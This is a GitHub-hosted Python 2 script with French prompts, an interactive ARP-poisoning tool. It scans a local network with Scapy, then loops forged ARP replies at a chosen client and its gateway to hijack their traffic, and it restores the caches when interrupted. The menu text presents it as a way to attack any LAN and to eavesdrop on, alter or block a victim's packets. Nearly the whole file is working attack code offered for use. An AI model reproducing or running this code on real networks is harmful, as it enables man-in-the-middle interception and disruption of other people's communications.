-
Notifications
You must be signed in to change notification settings - Fork 18
/
ARP_attaque.py
226 lines (202 loc) · 7.67 KB
/
ARP_attaque.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
from scapy.all import *
import os
import subprocess
import sys
import time
import threading
def ip_scan(ip):
print "SCAN DE L'ADRESSE IP "+ ip
x,y = arping(ip,verbose=0)
x.show()
def scanning():
print "[!] debut de la phase de la reconnaissance "
for i in range(1,4):
print"..."
time.sleep(0.2)
print " ----------------------------------------------------------- "
ifconfig = subprocess.Popen('ifconfig wlan0 | grep \'inet adr\' | cut -d \":\" -f 2 | cut -d \" \" -f 1',shell=True,stdout = subprocess.PIPE)
addr = ifconfig.stdout.read().strip('\n')
print "[!] votre adresse IP est : " + addr
print " ----------------------------------------------------------- "
table = subprocess.Popen("route",shell=True,stdout=subprocess.PIPE)
print table.stdout.read()
print " ----------------------------------------------------------- "
reseau = raw_input("[?] donner l'addresse reseau : ")
reseau = reseau.split(".")
compteur = 0
for num in reseau:
if num == "0":
break
compteur = compteur +1
res = ''
for i in range(0,compteur):
res = res + reseau[i]+ "."
if compteur == 3 :
print "[!] votre reseau a comme masque 255.255.255.0"
elif compteur == 2 :
print "[!] votre reseau a comme masque 255.255.0.0"
if compteur == 3 :
plage = raw_input("[*] definir la plage (exemple:1-50):")
plage = plage.split("-")
if len(plage) > 1 :
try:
threads = []
for i in range(int(plage[0]),int(plage[1])):
ip = res+str(i)
t = threading.Thread(target=ip_scan,args=([ip]))
threads.append(t)
t.start()
time.sleep(0.05)
except KeyboardInterrupt:
print "[!] arret du scan "
return menu()
if len(plage) == 1 :
ip = res+str(plage[0])
try:
print "SCAN DE L'ADRESSE IP "+ ip
x,y = arping(ip,verbose=0)
x.show()
except KeyboardInterrupt:
print "[!] arret du scan "
return menu()
if compteur == 2:
plage1 = raw_input("[?] definir la plage pour le 3 emme octet (exemple:1-2):")
plage1=plage1.split("-")
plage2 = raw_input("[?] definir la plage pour le 4 emme octet (exemple:1-50):")
plage2=plage2.split("-")
if len(plage1) > 1 and len(plage2) > 1 :
try:
threads = []
for i in range(plage1[0],plage1[1]):
for j in range(int(plage2[0]),int(plage2[1])):
ip = res+str(i)+"."+str(j)
t = threading.Thread(target=ip_scan,args=([ip]))
threads.append(t)
t.start()
time.sleep(0.05)
except KeyboardInterrupt:
print "[!] arret du scan "
return menu()
if len(plage1) == 1 and len(plage2) > 1 :
try:
threads = []
for j in range(int(plage2[0]),int(plage2[1])):
ip = res+plage1[0]+"."+str(j)
t = threading.Thread(target=ip_scan,args=([ip]))
threads.append(t)
t.start()
time.sleep(0.05)
except KeyboardInterrupt:
print "[!] arret du scan "
return menu()
if len(plage1) == 1 and len(plage2) == 1 :
try:
print "SCAN DE L'ADRESSE IP "+ ip
x,y = arping(ip,verbose=0)
x.show()
except KeyboardInterrupt:
print "[!] arret du scan "
return menu()
time.sleep(2)
print "[!] Fin du scan "
return menu()
def antidote(mac_client,ip_client,mac_gateway,ip_gateway):
print " \n lancement de l'antidote \n "
for i in range(1,4):
print "..."
time.sleep(1)
antidote_client = ARP()
antidote_gateway = ARP()
antidote_client.hwdst=mac_client
antidote_client.op=2
antidote_client.pdst=ip_client
antidote_client.hwsrc=mac_gateway
antidote_client.psrc=ip_gateway
antidote_gateway.hwdst=mac_gateway
antidote_gateway.op=2
antidote_gateway.pdst=ip_gateway
antidote_gateway.hwsrc=mac_client
antidote_gateway.psrc=ip_client
for i in range(1,10):
send(antidote_client)
send(antidote_gateway)
return
def poison(mac_client,ip_client,mac_gateway,ip_gateway):
for i in range(1,4):
print"..."
time.sleep(0.2)
poison_du_target = ARP()
poison_du_gateway = ARP()
poison_du_target.op = 2
poison_du_target.psrc = ip_gateway
poison_du_target.pdst = ip_client
poison_du_target.hwdst = mac_client
poison_du_gateway.op = 2
poison_du_gateway.psrc = ip_client
poison_du_gateway.pdst = ip_gateway
poison_du_gateway.hwdst = mac_gateway
try:
while True:
send(poison_du_target)
send(poison_du_gateway)
time.sleep(0.5)
except KeyboardInterrupt:
for i in range(1,4):
print"..."
time.sleep(0.2)
print "[*] lancement de l'antidote "
antidote(mac_client,ip_client,mac_gateway,ip_gateway)
def menu():
print " \t \t \t \t \tBenvenue"
print " \n \n "
print "cet outil va vous permettre de realiser l'ARP poisoning pour attaquer tout reseau local utilisant le protocole de resolution d'adresse ARP , les cas les plus repandus etant les reseaux Ethernet et Wi-Fi. Cette technique vas nous permettre par la suite de detourner des flux de communications transitant entre une machine cible et une passerelle,ensuite ecouter, modifier ou encore bloquer les paquets reseaux."
print " \n \n "
print " 0- voir votre table de routage et cache ARP "
print " 1- trouver les live hosts ( IP/MAC ) dans une plage dans mon reseau"
print " 2- trouver la correspondance IP/MAC d'un hote specifique "
print " 3- lancer l'ARP poisoning"
print " \n "
choix=raw_input("[?] taper le numero correspondant a votre choix : ")
if choix == "2" :
ip_mac()
if choix == "0":
cache_et_route()
if choix == "1":
scanning()
if choix == "3":
arp_poisoning()
def arp_poisoning():
print "'\n ( (\n ) ) ( )\n ( ) ) .---.\n ) ( .-\"\"-. ( ( / \\\n ( .-\"\"-. ( ) / _ _ \\ ) ) |() ()|\n / _ _ \\ ) |(_\\/_)| .---. ( (_ 0 _)\n |(_)(_)| ( .---. (_ /\\ _) / \\ .-\"\"-. |xxx|\n (_ /\\ _) / \\ |v==v| |<\\ />| / _ _ \\ \'---\'\n |wwww| |(\\ /)|( \'-..-\' (_ A _) |/_)(_\\|\n \'-..-\' (_ o _) ) .---. |===| (_ /\\ _)\n |===| ( / \\ \'---\' |mmmm|\n \'---\' |{\\ /}| \'-..-\'\n (_ V _)\n |\"\"\"|\n \'---\'\'"
print "[!] AVANT DE COMMENCER L'ATTAQUE VOUS DEVEZ CONNAITRE : \n (mac_client,ip_client,mac_gateway,ip_gateway) "
ip_client = raw_input("[?] ip_client :")
x,y = arping(ip_client,verbose=0)
x.show()
mac_client = raw_input("[?] coller ici la mac_client :")
ip_gateway = raw_input("[?] ip_gateway :")
x,y=arping(ip_gateway,verbose=0)
x.show()
mac_gateway = raw_input("[?] coller ici la mac_gateway :")
poison(mac_client,ip_client,mac_gateway,ip_gateway)
menu()
def ip_mac():
ip=raw_input("[?] donner l'adresse IP : ")
x,y = arping(ip,verbose=0)
x.show()
choix = raw_input("[?] une autre (y/n): ")
if choix.lower() == "y" :
ip_mac()
if choix.lower() == "n" :
return menu()
def cache_et_route():
print " ----------------------------------------------------------- "
ifconfig = subprocess.Popen('ifconfig wlan0 | grep \'inet adr\' | cut -d \":\" -f 2 | cut -d \" \" -f 1',shell=True,stdout = subprocess.PIPE)
addr = ifconfig.stdout.read().strip('\n')
print "[!] votre adresse IP est : " + addr
print " ----------------------------------------------------------- "
table = subprocess.Popen("route",shell=True,stdout=subprocess.PIPE)
print table.stdout.read()
print " ----------------------------------------------------------- "
cache = subprocess.Popen("arp",shell=True,stdout=subprocess.PIPE)
print cache.stdout.read()
choix =raw_input("[!] taper sur ENTRER pour revenir au menu : ")
return menu()